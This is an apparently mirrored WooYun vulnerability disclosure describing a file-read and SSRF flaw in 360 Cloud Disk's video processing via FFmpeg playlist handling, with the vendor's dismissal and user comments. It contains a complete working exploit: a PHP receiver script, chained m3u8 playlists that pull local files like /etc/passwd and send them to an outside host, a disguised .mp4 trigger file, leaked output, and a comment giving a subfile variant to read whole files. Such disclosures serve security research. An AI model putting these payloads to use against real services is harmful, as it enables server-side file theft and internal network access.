360云盘文件读取/SSRF

admin 2017年4月29日07:10:15评论324 views字数 214阅读0分42秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(59) 关注此漏洞

缺陷编号: WooYun-2016-205343

漏洞标题: 360云盘文件读取/SSRF

相关厂商: 奇虎360

漏洞作者: Noxxx

提交时间: 2016-05-05 16:23

公开时间: 2016-05-09 11:12

漏洞类型: 系统/服务补丁不及时

危害等级: 高

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

16人收藏


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

360云盘文件读取/SSRF

详细说明:

看了大神文章:

code 区域
https://hackerone.com/reports/115857
https://habrahabr.ru/company/mailru/blog/274855/

好像是FFmpeg分段读取的问题,然后自己动手测试.

一共4个文件:

comm.php (接收用的 也可以用监听一个端口)

code 区域
<?php
file_put_contents(time()."_test.txt",$_GET['x']);
?>

header.m3u8 (视频格式文件)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.u-url.org/exp/movie/comm.php?x=

remote.m3u8 (第二次转发的)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com
#EXT-X-ENDLIST
code 区域
http://baidu.com  也可以换成 本地资源文件: /etc/passwd

test.mp4 (最终上传触发)

code 区域
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/remote.m3u8
#EXT-X-ENDLIST

漏洞证明:

一切准备号了之后就上传test.mp4到360云盘上去。

360云盘文件读取/SSRF

code 区域
root:x:0:0:root:/root:/bin/bash

也可以ssrf

修复方案:

版权声明:转载请注明来源 Noxxx@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 11:12

厂商回复:

重复提交,故忽略。感谢关注360产品安全。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-05-09 11:55 | Noxxx ( 普通白帽子 | Rank:720 漏洞数:60 )

    0

    @奇虎360 哪里重复提交了?

  2. 2016-05-09 20:16 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    0

    应该不能重复吧,重复了的话能过审核么。。

  3. 2016-05-10 08:51 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    0

    好像只能读一行?

  4. 2016-05-10 09:31 | Noxxx ( 普通白帽子 | Rank:720 漏洞数:60 )

    0

    @1c3z #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://val.com/header.m3u8|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,64,,:///etc/passwd|subfile,,start,65,end,97,,:///etc/passwd #EXT-X-ENDLIST 使用subfile

  5. 2016-05-10 10:32 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    0

    @Noxxx 学习了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin